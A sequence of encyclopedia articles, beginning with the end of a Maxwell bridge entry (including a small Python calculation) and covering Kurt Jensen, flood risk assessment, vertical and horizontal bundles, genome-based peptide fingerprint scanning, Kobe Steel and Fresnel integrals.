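def maxwell_bridge_unknowns(r1: float, r4: float, r2: float, c2: float):
    """Given fixed arms R1, R4 (ohms) and the balancing values R2 (ohms)
    and C2 (farads) of the parallel RC arm, return the unknown coil's
    series resistance (ohms) and inductance (henries)."""
    r3 = r1 * r4 / r2
    l3 = r1 * r4 * c2
    return r3, l3

# Example: R1 = R4 = 1 kohm; balance found at R2 = 10 kohm, C2 = 100 nF
r_coil, l_coil = maxwell_bridge_unknowns(1e3, 1e3, 10e3, 100e-9)
print(f"R = {r_coil:.1f} ohm, L = {l_coil * 1e3:.1f} mH")  # R = 100.0 ohm, L = 100.0 mH
```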
The additional complexity of using a Maxwell-Wien bridge over simpler bridge types is warranted in circumstances where either the mutual inductance between the load and the known bridge entities, or stray electromagnetic interference, distorts the measurement results. The capacitive reactance in the bridge will exactly oppose the inductive reactance of the load when the bridge is balanced, allowing the load's resistance and reactance to be reliably determined. See also Wien bridge, a similar circuit for calibrating unknown capacitance Anderson's bridge, a modification of Maxwell's bridge that accurately measures self-inductance Bridge circuit Further reading References Electrical meters Bridge circuits Measuring instruments James Clerk Maxwell Impedance measurements
Maxwell bridge
Physics,Technology,Engineering
889
42,695,664
https://en.wikipedia.org/wiki/Kurt%20Jensen%20%28computer%20scientist%29
Kurt Jensen (born 1950) is a Danish computer science professor at Aarhus University who has been publishing peer-reviewed papers since 1976; by 2014 he had an h-index of 32. He is best known for his research into coloured Petri nets. References Living people 1950 births Academic staff of Aarhus University Danish computer scientists Date of birth missing (living people)
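As an aside on the metric cited above, the h-index is mechanical to compute: it is the largest h such that the author has at least h papers with at least h citations each. A minimal sketch with illustrative citation counts:

```python
# Minimal sketch of the h-index computation (illustrative values).

def h_index(citations: list[int]) -> int:
    """Largest h such that at least h papers have at least h citations."""
    ranked = sorted(citations, reverse=True)
    # ranked is descending, so "citations >= rank" holds for exactly
    # the first h positions; count them.
    return sum(1 for rank, c in enumerate(ranked, start=1) if c >= rank)

print(h_index([10, 8, 5, 4, 3]))  # 4: four papers with >= 4 citations each
```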
Kurt Jensen (computer scientist)
Technology
72
13,127,033
https://en.wikipedia.org/wiki/Flood%20risk%20assessment
A flood risk assessment (FRA) is an assessment of the risk of flooding from all flooding mechanisms and the identification of flood mitigation measures; it should also provide advice on actions to be taken before and during a flood. The sources of water which produce floods include groundwater, surface water (rivers, streams or watercourses), artificial water (burst water mains, canals or reservoirs), sewers and drains, and seawater. Each source of water produces a different hydraulic intensity. Floods can also occur because of a combination of sources of flooding, such as high groundwater and an inadequate surface water drainage system. The topography, hydrogeology and physical attributes of the existing or proposed development need to be considered. A flood risk assessment should evaluate the flood risk together with its consequences, impact and vulnerability. In the UK, professional flood risk assessments are written by civil engineering consultants. They will have membership of the Institution of Civil Engineers and are bound by its rules of professional conduct. A key requirement is that such professional flood risk assessments be independent of all parties, with the consultants carrying out their professional duties with complete objectivity and impartiality. Their professional advice should be supported by professional indemnity insurance for such advice, ultimately held with a Lloyd's of London underwriter. Professional flood risk assessments can cover single buildings or whole regions. They can be part of a due-diligence process for existing householders or businesses, or can be required in England and Wales to provide independent evidence on flood risk for a planning application. England and Wales In England and Wales, the Environment Agency requires a professional flood risk assessment (FRA) to be submitted alongside planning applications in areas that are known to be at risk of flooding (within flood zones 2 or 3) and/or are greater than 1 ha in area; planning permission is not usually granted until the FRA has been accepted by the Environment Agency. PPS 25 – England only Flood risk assessments are required to be completed according to the National Planning Policy Framework, which replaces Planning Policy Statement PPS 25: Development and Flood Risk. The initial legislation (PPG25) was introduced in 2001 and subsequently revised. PPS 25 was designed to "strengthen and clarify the key role of the planning system in managing flood risk and contributing to adapting to the impacts of climate change", and sets out policies for local authorities to ensure flood risk is taken into account during the planning process, to prevent inappropriate development in high-risk areas and to direct development away from areas at highest risk. In its introduction, PPS25 states that "flooding threatens life and causes substantial damage to property [and that] although [it] cannot be wholly prevented, its impacts can be avoided and reduced through good planning and management". Composition of an FRA For a flood risk assessment to be written, information is needed concerning the existing and proposed developments, the Environment Agency's modelled flood levels, and topographic levels on site. At its simplest (and cheapest) level, an FRA can provide an indication of whether development will be allowed to take place at a site. An initial idea of the risk of fluvial flooding to a local area can be found on the Environment Agency flood map website.
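The screening rule just described for England and Wales (flood zone 2 or 3, or a site over 1 ha) is simple enough to state as a predicate. The sketch below is an illustrative simplification of that rule only, not a statement of the full planning requirements, and the function name is hypothetical.

```python
# Illustrative encoding of the England and Wales FRA screening rule
# described above (a simplification; real planning rules have further
# conditions and exceptions).

def fra_required(flood_zone: int, site_area_ha: float) -> bool:
    """True when an FRA must accompany the planning application:
    the site is in flood zone 2 or 3, or exceeds 1 ha in area."""
    return flood_zone in (2, 3) or site_area_ha > 1.0

print(fra_required(flood_zone=1, site_area_ha=0.5))  # False
print(fra_required(flood_zone=2, site_area_ha=0.5))  # True
print(fra_required(flood_zone=1, site_area_ha=2.0))  # True
```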
FRAs consist of a detailed analysis of available data to inform the Environment Agency of flood risk at an individual site, and also recommend mitigation measures to the developer. A more costly analysis of flood risk can be achieved through detailed flood modelling to challenge the agency's modelled levels and corresponding flood zones. The FRA takes into account the risk and impact of flooding on the site, and considers how the development may affect flooding in the local area. It also provides recommendations as to how the risk of flooding to the development can be mitigated. FRAs should also consider flooding from all sources, including fluvial, groundwater, surface water runoff and sewer flooding. For sites located within areas at risk of flooding, a sequential test may be required. The aim of the sequential test is to direct development to locations at the lowest risk of flooding. The National Planning Policy Framework (NPPF) was amended in 2020 to require sequential tests for sites that are at risk of any form of flooding. Northern Ireland In 2006, the Planning Service, part of the Department of the Environment, published Planning Policy Statement 15 (PPS15): Planning and Flood Risk. The guidelines are precautionary and advise against development in flood plains and areas subject to historical flooding. In exceptional cases an FRA can be completed to justify development in flood risk areas. Advice on flood risk assessment is provided to the Planning Service by the Rivers Agency, which is the statutory drainage and flood defence authority for Northern Ireland. Republic of Ireland In 2009, the Department of the Environment, Heritage and Local Government and the Office of Public Works published planning guidelines requiring local authorities to apply a sequential approach to flood risk management. The guidelines require that proposed development in flood risk areas must undergo a justification test, consisting of a flood risk assessment. See also Flood warning Floods directive Flood Modeller Pro, software used to undertake flood risk assessments References Flood control Environmental policy in the United Kingdom Extreme value data
Flood risk assessment
Chemistry,Engineering
1,036
4,067,918
https://en.wikipedia.org/wiki/Vertical%20and%20horizontal%20bundles
In mathematics, the vertical bundle and the horizontal bundle are vector bundles associated to a smooth fiber bundle. More precisely, given a smooth fiber bundle π : E → B, the vertical bundle VE and horizontal bundle HE are subbundles of the tangent bundle TE of E whose Whitney sum satisfies VE ⊕ HE ≅ TE. This means that, over each point e ∈ E, the fibers V_eE and H_eE form complementary subspaces of the tangent space T_eE. The vertical bundle consists of all vectors that are tangent to the fibers, while the horizontal bundle requires some choice of complementary subbundle. To make this precise, define the vertical space V_eE at e ∈ E to be V_eE := ker(dπ_e). That is, the differential dπ_e : T_eE → T_bB (where b = π(e)) is a linear surjection whose kernel has the same dimension as the fibers of π. If we write F = π⁻¹(b), then V_eE consists of exactly the vectors in T_eE which are also tangent to F. The name is motivated by low-dimensional examples like the trivial line bundle over a circle, which is sometimes depicted as a vertical cylinder projecting to a horizontal circle. A subspace H_eE of T_eE is called a horizontal space if T_eE is the direct sum of V_eE and H_eE. The disjoint union of the vertical spaces V_eE for each e in E is the subbundle VE of TE; this is the vertical bundle of E. Likewise, provided the horizontal spaces H_eE vary smoothly with e, their disjoint union is a horizontal bundle. The use of the words "the" and "a" here is intentional: each vertical subspace is unique, defined explicitly by V_eE = ker(dπ_e). Excluding trivial cases, there are an infinite number of horizontal subspaces at each point. Also note that arbitrary choices of horizontal space at each point will not, in general, form a smooth vector bundle; they must also vary in an appropriately smooth way. The horizontal bundle is one way to formulate the notion of an Ehresmann connection on a fiber bundle. Thus, for example, if E is a principal G-bundle, then the horizontal bundle is usually required to be G-invariant: such a choice is equivalent to a connection on the principal bundle. This notably occurs when E is the frame bundle associated to some vector bundle, which is a principal bundle. Formal definition Let π : E → B be a smooth fiber bundle over a smooth manifold B. The vertical bundle is the kernel VE := ker(dπ) of the tangent map dπ : TE → TB. Since dπ_e is surjective at each point e, it yields a regular subbundle of TE. Furthermore, the vertical bundle VE is also integrable. An Ehresmann connection on E is a choice of a complementary subbundle HE to VE in TE, called the horizontal bundle of the connection. At each point e in E, the two subspaces form a direct sum, such that T_eE = V_eE ⊕ H_eE. Example The Möbius strip is a line bundle over the circle, and the circle can be pictured as the middle ring of the strip. At each point on the strip, the projection map projects it towards the middle ring, and the fiber is perpendicular to the middle ring. The vertical bundle at this point is the tangent space to the fiber. A simple example of a smooth fiber bundle is a Cartesian product of two manifolds. Consider the bundle B1 := (M × N, pr1) with bundle projection pr1 : M × N → M : (x, y) → x. Applying the definition in the paragraph above to find the vertical bundle, we consider first a point (m, n) in M × N. Then the image of this point under pr1 is m. The preimage of m under this same pr1 is {m} × N, so that T_(m,n)({m} × N) = {m} × T_nN. The vertical bundle is then VB1 = M × TN, which is a subbundle of T(M × N). If we take the other projection pr2 : M × N → N : (x, y) → y to define the fiber bundle B2 := (M × N, pr2), then the vertical bundle will be VB2 = TM × N.
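The kernels in this example can be written out explicitly. The following display is a sketch only; the identification T(M × N) ≅ TM × TN that it uses is standard but is stated here as a notational assumption rather than derived.

```latex
% Worked check of the product-bundle example (sketch), assuming the
% standard identification T(M \times N) \cong TM \times TN.
\[
  d(\mathrm{pr}_1)_{(m,n)} \colon T_m M \times T_n N \to T_m M,
  \qquad (u, v) \mapsto u ,
\]
\[
  V_{(m,n)} B_1 = \ker d(\mathrm{pr}_1)_{(m,n)} = \{0\} \times T_n N ,
  \qquad
  V_{(m,n)} B_2 = \ker d(\mathrm{pr}_2)_{(m,n)} = T_m M \times \{0\} ,
\]
% so that, fiberwise,
\[
  T_{(m,n)}(M \times N) = V_{(m,n)} B_1 \oplus V_{(m,n)} B_2 ,
\]
% matching VB_1 = M x TN and VB_2 = TM x N above.
```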
In both cases, the product structure gives a natural choice of horizontal bundle, and hence an Ehresmann connection: the horizontal bundle of B1 is the vertical bundle of B2 and vice versa. Properties Various important tensors and differential forms from differential geometry take on specific properties on the vertical and horizontal bundles, or even can be defined in terms of them. Some of these are: A vertical vector field is a vector field that is in the vertical bundle. That is, for each point e of E, one chooses a vector Xe ∈ VeE, where VeE is the vertical vector space at e. A differentiable r-form α on E is said to be a horizontal form if α(v1, ..., vr) = 0 whenever at least one of the vectors v1, ..., vr is vertical. The connection form vanishes on the horizontal bundle, and is non-zero only on the vertical bundle. In this way, the connection form can be used to define the horizontal bundle: the horizontal bundle is the kernel of the connection form. The solder form or tautological one-form vanishes on the vertical bundle and is non-zero only on the horizontal bundle. By definition, the solder form takes its values entirely in the horizontal bundle. For the case of a frame bundle, the torsion form vanishes on the vertical bundle, and can be used to define exactly that part that needs to be added to an arbitrary connection to turn it into a Levi-Civita connection, i.e. to make a connection be torsionless. Indeed, if one writes θ for the solder form, then the torsion tensor Θ is given by Θ = Dθ (with D the exterior covariant derivative). For any given connection ω, there is a unique one-form σ on TE, called the contorsion tensor, that is vanishing in the vertical bundle, and is such that ω + σ is another connection 1-form that is torsion-free. The resulting one-form ω + σ is nothing other than the Levi-Civita connection. One can take this as a definition: since the torsion is given by Θ = Dθ = dθ + ω ∧ θ, the vanishing of the torsion is equivalent to having dθ = −(ω + σ) ∧ θ, and it is not hard to show that σ must vanish on the vertical bundle, and that σ must be G-invariant on each fibre (more precisely, that σ transforms in the adjoint representation of G). Note that this defines the Levi-Civita connection without making any explicit reference to any metric tensor (although the metric tensor can be understood to be a special case of a solder form, as it establishes a mapping between the tangent and cotangent bundles of the base space, i.e. between the horizontal and vertical subspaces of the frame bundle). In the case where E is a principal bundle, then the fundamental vector field must necessarily live in the vertical bundle, and vanish in any horizontal bundle. Notes References Differential topology Fiber bundles Connection (mathematics)
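The product-bundle example above can be written out as a one-step kernel computation. The following LaTeX fragment is a sketch in my own notation (following the article's pr1 example) rather than text from the original article:

```latex
\documentclass{article}
\usepackage{amsmath}
\begin{document}
% Vertical space of the trivial bundle pr1 : M x N -> M at a point (m, n).
For the product bundle $\operatorname{pr}_1 \colon M \times N \to M$, the
differential at $(m,n)$ is the projection
\[
  d(\operatorname{pr}_1)_{(m,n)} \colon T_m M \oplus T_n N \to T_m M,
  \qquad (u, v) \mapsto u ,
\]
so the vertical space is its kernel,
\[
  V_{(m,n)}(M \times N) = \ker d(\operatorname{pr}_1)_{(m,n)}
    = \{0\} \oplus T_n N \cong T_n N ,
\]
and one natural horizontal choice is $H_{(m,n)} = T_m M \oplus \{0\}$,
recovering $T_{(m,n)}(M \times N) = V_{(m,n)} \oplus H_{(m,n)}$.
\end{document}
```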
Vertical and horizontal bundles
Mathematics
1,424
7,324,297
https://en.wikipedia.org/wiki/Genome-based%20peptide%20fingerprint%20scanning
Genome-based peptide fingerprint scanning (GFS) is a system in bioinformatics analysis that attempts to identify the genomic origin (that is, what species they come from) of sample proteins by scanning their peptide-mass fingerprint against the theoretical translation and proteolytic digest of an entire genome. This method is an improvement over previous methods because it compares the peptide fingerprints to an entire genome instead of comparing them to an already annotated genome. This improvement has the potential to improve genome annotation and identify proteins with incorrect or missing annotations. History and background GFS was designed by Michael C. Giddings (University of North Carolina, Chapel Hill) et al., and released in 2003. Giddings expanded the algorithms for GFS from earlier ideas. Two papers were published in 1993 explaining the techniques used to identify proteins in sequence databases. These methods determined the mass of peptides using mass spectrometry, and then used the mass to search protein databases to identify the proteins. In 1999 a more complex program called Mascot was released that integrated three types of protein/database searches: peptide molecular weights, tandem mass spectrometry from one or more peptides, and combined mass data with amino acid sequence. The drawback of this widely used program is that it is unable to detect alternative splice sites that are not currently annotated, and it is not usually able to find proteins that have not been annotated. Giddings built upon these sources to create GFS, which compares peptide mass data to entire genomes to identify the proteins. Giddings's system is able to find new annotations of genes that had not been found, such as undocumented genes and undocumented alternative splice sites. Research examples In 2012, research was published in which genes and proteins were found in a model organism that could not have been found without GFS, because they had not been previously annotated. The planarian Schmidtea mediterranea has been used in research for over 100 years. This planarian is capable of regenerating missing body parts and is therefore emerging as a potential model organism for stem cell research. Planarians are covered in mucus which aids in locomotion, protects them from predation, and helps their immune system. The genome of Schmidtea mediterranea is sequenced but mostly un-annotated, making it a prime candidate for genome-based peptide fingerprint scanning. When the proteins were analyzed with GFS, 1,604 proteins were identified. These proteins had mostly not been annotated before they were found with GFS. They were also able to find the mucous subproteome (all the genes associated with mucus production). They found that this proteome was conserved in the sister species Schmidtea mansoni. The mucous subproteome is so conserved that 119 orthologs of planarians are found in humans. Due to the similarity of these genes, the planarian can now be used as a model to study mucous protein function in humans. This is relevant for infections and diseases related to mucous aberrancies such as cystic fibrosis, asthma, and other lung diseases. These genes could not have been found without GFS because they had not been previously annotated. In February 2013, proteogenomic mapping research was done with ENCODE to identify translational regions in the human genome.
They applied peptide fingerprint scanning and MASCOT to the protein data to find regions that may not have been previously annotated as translated in the human genome. This search against the whole genome revealed that approximately 4% of the unique peptides they found were outside of previously annotated regions. The whole-genome comparison also revealed 15% more hits than a protein database search (such as MASCOT) alone. GFS can be used as a complementary method for annotation because it can find new genes or splice sites that have not been annotated before. However, the whole-genome approach used by GFS can be less sensitive than programs that look only at annotated regions. References External links Genome-based Peptide Fingerprint Scanning (GFS) Documentation Facebook link to "Genome-based Peptide Fingerprint Scanning" Explanation of MS/MS in relation to MASCOT Bioinformatics Genomics techniques
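The core matching idea, digesting every candidate protein region of a genome in silico and counting how many observed peptide masses each region explains, can be sketched in a few lines of Python. This is a simplified illustration, not the published GFS implementation: the trypsin rule is abbreviated, the "genome" is a toy dictionary of hypothetical translated regions, and the 0.2 Da tolerance is an assumed value.

```python
# Hedged sketch of the idea behind genome-based peptide fingerprint
# scanning: digest candidate protein regions in silico and match observed
# peptide masses against them within a tolerance.

MONO = {  # monoisotopic amino acid residue masses (Da)
    'G': 57.02146, 'A': 71.03711, 'S': 87.03203, 'P': 97.05276,
    'V': 99.06841, 'T': 101.04768, 'C': 103.00919, 'L': 113.08406,
    'I': 113.08406, 'N': 114.04293, 'D': 115.02694, 'Q': 128.05858,
    'K': 128.09496, 'E': 129.04259, 'M': 131.04049, 'H': 137.05891,
    'F': 147.06841, 'R': 156.10111, 'Y': 163.06333, 'W': 186.07931,
}
WATER = 18.01056  # mass of H2O added on hydrolysis

def tryptic_peptides(protein):
    """Cleave after K or R (not before P): a simplified trypsin rule."""
    peptides, start = [], 0
    for i, aa in enumerate(protein):
        if aa in 'KR' and not (i + 1 < len(protein) and protein[i + 1] == 'P'):
            peptides.append(protein[start:i + 1])
            start = i + 1
    if start < len(protein):
        peptides.append(protein[start:])
    return peptides

def peptide_mass(p):
    return sum(MONO[a] for a in p) + WATER

def match_fingerprint(observed_masses, genome_proteins, tol=0.2):
    """Count, per candidate region, how many observed masses it explains."""
    hits = {}
    for name, seq in genome_proteins.items():
        theoretical = [peptide_mass(p) for p in tryptic_peptides(seq)]
        hits[name] = sum(
            any(abs(m - t) <= tol for t in theoretical)
            for m in observed_masses
        )
    return hits

# Toy "genome": two hypothetical translated regions, one unannotated.
regions = {
    'annotated_gene': 'MKWVTFISLLFLFSSAYSRGVFRR',
    'unannotated_orf': 'MGDVEKGKKIFIMKCSQCHTVEK',
}
observed = [peptide_mass('GVFR'), peptide_mass('IFIMK')]
print(match_fingerprint(observed, regions))  # each region explains one mass
```

Because the theoretical digest is built from the genome itself rather than from an annotation database, a peptide falling in an unannotated open reading frame can still be matched, which is exactly the advantage the ENCODE study above exploited.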
Genome-based peptide fingerprint scanning
Chemistry,Engineering,Biology
887
2,650,443
https://en.wikipedia.org/wiki/Kobe%20Steel
Kobe Steel, Ltd. (株式会社神戸製鋼所, Kabushiki gaisha Kōbe Seikō-sho), is a major Japanese steel manufacturer headquartered in Chūō-ku, Kobe. KOBELCO is the unified brand name of the Kobe Steel Group. Kobe Steel has the lowest proportion of steel operations of any major steelmaker in Japan and is characterised as a conglomerate comprising the three pillars of the Materials Division, the Machinery Division and the Power Division. The materials division has a high market share in wire rods and aluminium materials for transport equipment, while the machinery division has a high market share in screw compressors. In addition, the power sector has one of the largest wholesale power supply operations in the country. Kobe Steel is a member of the Mizuho keiretsu. It was formerly part of the DKB Group and Sanwa Group keiretsu, which were later subsumed into Mizuho. The company is listed on the Tokyo and Nagoya stock exchanges, where its stock is a component of the Nikkei 225. As of 31 March 2022, Kobe Steel had 201 subsidiaries and 50 affiliated companies across Japan, Asia, Europe, the Middle East and the US. Its main production facilities are the Kakogawa Steel Works and Takasago Works. Kobe Steel is also known as the owner of the rugby team Kobelco Steelers. History In 1905, the general partnership trading company Suzuki Shoten acquired a steel business in Wakinohama, Kobe, called Kobayashi Seikosho, operated by Seiichiro Kobayashi, and changed its name to Kobe Seikosho. Then, in 1911, Suzuki Shoten spun off the company to establish Kobe Steel Works, Ltd. at Wakinohamacho, Kobe. After the Russo-Japanese War, as the Imperial Japanese Navy adopted a policy of fostering private factories, Kobe Steel received technical guidance and orders from the Kure Naval Arsenal and other arsenals in Maizuru and Yokosuka, and expanded its scale. Around 1914, the company started making machinery for naval vessels and began its journey as a machine manufacturer. Its business performance expanded, partly due to the shipbuilding boom during World War I. In 1918, it acquired the rights to manufacture diesel engines from Sulzer of Switzerland, helping to advance the Japanese naval, marine, locomotive and automobile transport sectors. Today, the KOBELCO Group operates a broad range of business fields that cover Steel & Aluminum, Advanced Materials, Welding, Machinery, Engineering, Construction Machinery, and Electric Power. In the Great Hanshin Earthquake of January 1995, the Kobe head office building and company housing collapsed, and the No. 3 blast furnace at the Kobe Steel Works was damaged and underwent an emergency shutdown; the damage, approximately JPY 100 billion, was the largest suffered by a private company. The No. 3 blast furnace, which restarted only two and a half months after the earthquake, became a 'symbol of recovery', but was shut down in October 2017 in order to strengthen competitiveness. In recent years, the company has been focusing on fields other than steel, such as aluminium, machinery, and electric power, and is clearly aiming to change from being a 'steelmaker' to a 'manufacturer that also handles steel'. Former prime minister Shinzō Abe worked at Kobe Steel before entering politics.
Main locations Source: Domestic Locations Kobe Head Office Tokyo Head Office Takasago Works Kobe Corporate Research Laboratories Kakogawa Works Research & Development Laboratory Kobe Wire Rod & Bar Plant Fujisawa Office Ibaraki Plant Saijo Plant Fukuchiyama Plant Moka Works Chofu Works Daian Works Overseas Regional Headquarters and Offices Kobe Steel USA Inc. (U.S. headquarters): 19575 Victor Parkway, Suite 200, Livonia, MI 48152, USA Kobelco (China) Holding Co., Ltd. (China headquarters, investment company): Room 3701, Hong Kong New World Tower, No. 300 Middle Huaihai Road, Huangpu District, Shanghai, 200021, People's Republic of China Kobelco (China) Holding Co., Ltd. (Guangzhou Branch): Room 1203, #285 East Linhe Road, Tianhe District, Guangzhou City, Guangdong Province, People's Republic of China Kobelco South East Asia Ltd. (Regional headquarters for Southeast Asia and South Asia): 17th Floor, Sathorn Thani Tower ll, 92/49 North Sathorn Road, Khwaeng Silom, Khet Bangrak, Bangkok, 10500, Kingdom of Thailand Kobelco Europe GmbH (Regional Headquarters for Europe and the Middle East): Luitpoldstrasse 3, 80335 Munich, Germany Business Units & Main Products Source: Steel & Aluminum Steel Sheets Wire Rods and Bars Aluminum Plate Steel Plates Welding Robots and Electric Power Sources Welding Materials Advanced Materials Steel Castings and Forgings Titanium Copper Sheet and Strip Steel Powder Machinery Standard Compressors Rotating Machinery Tire and Rubber Machinery Plastic Processing Machinery Advanced Technology Equipment Rolling Mill / Press Machine Ultra High Pressure Equipment Energy & Chemical Field Engineering Iron Unit Field Advanced Urban Transit System Electric Power Wholesale Power Supply Scandal In October 2017, Kobe Steel admitted to falsifying data on the strength and durability of its aluminium, copper and steel products. The scandal deepened when the company said it had also found falsified data on its iron ore powder, which caused its shares to fall 18%. By 11 October, shares had fallen by a third. After testing parts of its bullet trains, the Central Japan Railway Company announced that 310 components contained sub-standard parts supplied by Kobe Steel. Following further news in October 2017 that car makers Toyota, Nissan, and General Motors, and train manufacturer Hitachi, were among 200 companies affected by Kobe Steel's mislabelling, which had potential safety implications for their vehicles, the CEO of Kobe Steel conceded that his company now had "zero credibility". Other affected companies include Ford, Boeing and Mitsubishi Heavy Industries. CEO Kawasaki promised to lead an internal investigation. On 13 October 2017, Kobe Steel admitted that the number of companies misled was over 500. Despite the costs of dealing with the scandal, Kobe Steel issued a revised profit forecast in February 2018 announcing that it expected to generate a net profit of ¥45 billion ($421 million) for the full 2017 fiscal year, marking its first net profit in three years.
Gallery See also Kobeseiko Te-Gō References External links Official global website Kobe Steel Group of Companies History of Kobe Steel Group Kobelco Construction Machinery Europe Steel companies of Japan Crane manufacturers Construction equipment manufacturers of Japan Companies listed on the Tokyo Stock Exchange Companies listed on the Nagoya Stock Exchange Companies listed on the Osaka Exchange Companies in the Nikkei 225 Manufacturing companies based in Kobe Manufacturing companies established in 1905 Japanese companies established in 1905 Defense companies of Japan Japanese brands Midori-kai Industrial machine manufacturers
Kobe Steel
Engineering
1,382
271,143
https://en.wikipedia.org/wiki/Fresnel%20integral
The Fresnel integrals S(x) and C(x) are two transcendental functions named after Augustin-Jean Fresnel that are used in optics and are closely related to the error function (erf). They arise in the description of near-field Fresnel diffraction phenomena and are defined through the following integral representations: S(x) = ∫₀ˣ sin(t²) dt and C(x) = ∫₀ˣ cos(t²) dt. The parametric curve (C(t), S(t)) is the Euler spiral or clothoid, a curve whose curvature varies linearly with arclength. The term Fresnel integral may also refer to the complex definite integral ∫₀^∞ e^(iax²) dx = (1/2)√(π/a) e^(iπ/4), where a is real and positive; this can be evaluated by closing a contour in the complex plane and applying Cauchy's integral theorem. Definition The Fresnel integrals admit the following power series expansions that converge for all x: S(x) = Σ_{n=0}^∞ (−1)ⁿ x^(4n+3)/((2n+1)!(4n+3)) and C(x) = Σ_{n=0}^∞ (−1)ⁿ x^(4n+1)/((2n)!(4n+1)). Some widely used tables use (π/2)t² instead of t² for the argument of the integrals defining S(x) and C(x). This changes their limits at infinity from (1/2)√(π/2) to 1/2 and the arc length for the first spiral turn from 2√π to 2 (at t = 2). These alternative functions are usually known as normalized Fresnel integrals. Euler spiral The Euler spiral, also known as a Cornu spiral or clothoid, is the curve generated by a parametric plot of S(t) against C(t). The Euler spiral was first studied in the mid 18th century by Leonhard Euler in the context of Euler–Bernoulli beam theory. A century later, Marie Alfred Cornu constructed the same spiral as a nomogram for diffraction computations. From the definitions of the Fresnel integrals, the infinitesimals are thus dx = C′(t) dt = cos(t²) dt and dy = S′(t) dt = sin(t²) dt. Thus the length of the spiral measured from the origin can be expressed as L = ∫₀^(t₀) √(dx² + dy²) = ∫₀^(t₀) dt = t₀. That is, the parameter t is the curve length measured from the origin (0, 0), and the Euler spiral has infinite length. The vector (cos(t²), sin(t²)) also expresses the unit tangent vector along the spiral, giving the tangent angle θ = t². Since t is the curve length, the curvature κ can be expressed as κ = dθ/dt = 2t. Thus the rate of change of curvature with respect to the curve length is dκ/dt = 2. An Euler spiral has the property that its curvature at any point is proportional to the distance along the spiral, measured from the origin. This property makes it useful as a transition curve in highway and railway engineering: if a vehicle follows the spiral at unit speed, the parameter t in the above derivatives also represents the time. Consequently, a vehicle following the spiral at constant speed will have a constant rate of angular acceleration. Sections from Euler spirals are commonly incorporated into the shape of rollercoaster loops to make what are known as clothoid loops. Properties S(x) and C(x) are odd functions of x, which can be readily seen from the fact that their power series expansions have only odd-degree terms, or alternatively because they are antiderivatives of even functions that also are zero at the origin. Asymptotics of the Fresnel integrals as x → ∞ are given by the formulas S(x) ≈ √(π/8) − cos(x²)/(2x) and C(x) ≈ √(π/8) + sin(x²)/(2x). Using the power series expansions above, the Fresnel integrals can be extended to the domain of complex numbers, where they become entire functions of the complex variable z. The Fresnel integrals can be expressed using the error function as follows: C(z) + iS(z) = (√π/2) e^(iπ/4) erf(e^(−iπ/4) z), or, taking the complex conjugate, C(z) − iS(z) = (√π/2) e^(−iπ/4) erf(e^(iπ/4) z). Limits as x approaches infinity The integrals defining C(x) and S(x) cannot be evaluated in closed form in terms of elementary functions, except in special cases. The limits of these functions as x goes to infinity are known: lim(x→∞) C(x) = lim(x→∞) S(x) = (1/2)√(π/2) = √(π/8). This can be derived with any one of several methods. One of them uses a contour integral of the function e^(−z²) around the boundary of the sector-shaped region in the complex plane formed by the positive x-axis, the bisector of the first quadrant y = x with x ≥ 0, and a circular arc of radius R centered at the origin.
As R goes to infinity, the integral along the circular arc z = Re^(it), 0 ≤ t ≤ π/4, tends to 0, since |∫arc e^(−z²) dz| ≤ R ∫₀^(π/4) e^(−R² cos 2t) dt ≤ R ∫₀^(π/4) e^(−R²(1 − 4t/π)) dt = (π/(4R))(1 − e^(−R²)), where polar coordinates were used and Jordan's inequality was utilised for the second inequality. The integral along the real axis tends to the half Gaussian integral ∫₀^∞ e^(−x²) dx = √π/2. Note too that because the integrand is an entire function on the complex plane, its integral along the whole contour is zero. Overall, we must have ∫L e^(−z²) dz = ∫₀^∞ e^(−x²) dx, where L denotes the bisector of the first quadrant. To evaluate the left hand side, parametrize the bisector as z = te^(iπ/4), where t ranges from 0 to +∞. Note that the square of this expression is just z² = it². Therefore, substitution gives the left hand side as ∫₀^∞ e^(−it²) e^(iπ/4) dt. Using Euler's formula to take real and imaginary parts of e^(−it²) gives this as ∫₀^∞ (cos t² − i sin t²)(√2/2)(1 + i) dt = (√2/2) ∫₀^∞ (cos t² + sin t²) dt + i(√2/2) ∫₀^∞ (cos t² − sin t²) dt = √π/2 + 0i, where we have written 0i to emphasize that the original Gaussian integral's value is completely real with zero imaginary part. Letting IC = ∫₀^∞ cos t² dt and IS = ∫₀^∞ sin t² dt and then equating real and imaginary parts produces the following system of two equations in the two unknowns IC and IS: IC + IS = √(π/2) and IC − IS = 0. Solving this for IC and IS gives the desired result. Generalization The integral ∫₀^x t^m e^(it^n) dt = (x^(m+1)/(m+1)) ₁F₁((m+1)/n; (m+1)/n + 1; ix^n) is a confluent hypergeometric function and also an incomplete gamma function (it can equally be written in terms of γ((m+1)/n, −ix^n)), which reduces to Fresnel integrals if real or imaginary parts are taken: the case m = 0, n = 2 gives C(x) + iS(x) = ∫₀^x e^(it²) dt. The leading term in the asymptotic expansion of the confluent hypergeometric function gives, in the limit, ∫₀^∞ t^m e^(it^n) dt = (Γ((m+1)/n)/n) e^(iπ(m+1)/(2n)). For m = 0, the imaginary part of this equation in particular is ∫₀^∞ sin(x^a) dx = Γ(1 + 1/a) sin(π/(2a)), with the left-hand side converging for a > 1 and the right-hand side being its analytical extension to the whole plane less where lie the poles of Γ(1 + 1/a). The Kummer transformation of the confluent hypergeometric function is M(a, b, z) = e^z M(b − a, b, −z), with M(a, b, z) := ₁F₁(a; b; z). Numerical approximation For computation to arbitrary precision, the power series is suitable for small argument. For large argument, asymptotic expansions converge faster. Continued fraction methods may also be used. For computation to particular target precision, other approximations have been developed. Cody developed a set of efficient approximations based on rational functions that give small relative errors. A FORTRAN implementation of the Cody approximation that includes the values of the coefficients needed for implementation in other languages was published by van Snyder. Boersma developed an approximation with error less than 1.6×10⁻⁹. Applications The Fresnel integrals were originally used in the calculation of the electromagnetic field intensity in an environment where light bends around opaque objects. More recently, they have been used in the design of highways and railways, specifically their curvature transition zones, see track transition curve. Other applications are rollercoasters or calculating the transitions on a velodrome track to allow rapid entry to the bends and gradual exit. Gallery See also Böhmer integral Fresnel zone Track transition curve Euler spiral Zone plate Dirichlet integral Notes References (Uses (π/2)t² instead of t².) External links Cephes, free/open-source C++/C code to compute Fresnel integrals among other special functions. Used in SciPy and ALGLIB. Faddeeva Package, free/open-source C++/C code to compute complex error functions (from which the Fresnel integrals can be obtained), with wrappers for Matlab, Python, and other languages. Integral calculus Spirals Physical optics Special functions Special hypergeometric functions Analytic functions Diffraction
